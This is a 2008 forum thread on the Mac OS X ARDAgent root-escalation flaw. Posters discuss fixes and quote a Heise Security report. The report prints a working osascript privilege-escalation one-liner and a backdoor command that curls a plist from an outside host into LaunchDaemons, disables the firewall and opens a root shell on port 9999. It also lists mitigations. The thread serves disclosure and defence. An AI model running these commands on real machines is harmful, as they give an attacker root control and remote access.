[Spktyr]

Don’t they mean that you should *disable* the function?

Also, RM is turned off by default in a Leopard install.

[Swordmaker]

Don’t they mean that you should *disable* the function?

Nope... It seems that it must be enabled for it to be non-modifiable.

Activating Remote Management, moving the location of ARDAgent, compressing it in a ZIP file, deleting the User ID for ARDAgent, are appatently all cures for this particular vulnerability.

[Swordmaker]

I've been reading over the thread at ShadowMac that seems to be the source of this tempest in a teapot. . . They are making jokes about it. . . and tossing code examples back and forth. Sprinkled in amongst all that are comments like "I can't get it to work" and "I wish I had a Mac so I could test it" and "It won't do this" and "It won't do that."

One participant said yesterday:

"well I suppose I should write my own little trojan so I can get famous too! — Famous... I don't even think 100 sites have this posted. No one has received recognition from outside sources, the most I heard was "bunch of kids." No one released it so the press will die off in a couple of days. So in summary no ones famous, but if you guys want to release a worm/trojan/whatever and get busted go ahead."

<> It looks to me as if this is another flash-in-the-pan attempt at exploiting an announced vulnerability without a means of vectoring it besides psychological engineering (Convincing stupid users to download it and run it). At this point, the "Trojan" exists only as an Applescript on some hacker sites, with no attempt at releasing it.

[Swordmaker]

Information from Heise-online.co.uk.

---

20 June 2008, 11:58

Root exploit for Mac OS X A vulnerability in Mac OS X 10.4 and 10.5 makes it easy for potential attackers to obtain root rights to a system. The ARDAgent – Apple Remote Desktop – part of Remote Management has the SUID bit set. ARDAgent is able to run AppleScript with root rights and these, in turn, may contain shell commands – all without requiring a password.

To demonstrate the problem as a standard user or guest on a computer, type osascript -e 'tell app "ARDAgent" to do shell script "whoami"'; into the console. Physical access to a system is not required for an attack to be successful. In principle, the exploit will also work remotely, say on a server on which a user has a restricted account with SSH access.

A suggestion of how this could be exploited to implement a backdoor has already been posted on Slashdot. When tested at heise Security, the line:

osascript -e 'tell app "ARDAgent" to do shell script "cd /System/Library/LaunchDaemons ; curl -o bash.plist http://cdslash.net/temp/bash.plist [cdslash.net] ; chmod 600 bash.plist ; launchctl load bash.plist ; launchctl start com.apple.bash ; ipfw disable firewall; launchctl "'

opened a root shell at TCP port 9999.

Several ways to solve the problem have now been suggested. The exploit doesn't work if the "Remote Management" option is enabled under Mac OS X 10.5 "System Settings/Sharing/" – but this is not the default setting. Neither does it work if the Apple Remote Desktop client has been installed and enabled under Mac OS X 10.4. Other suggestions are to completely remove the Apple Remote Desktop, to compress the file, or to delete the SUID bit in ARDAgent

chmod u-s /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAg ent.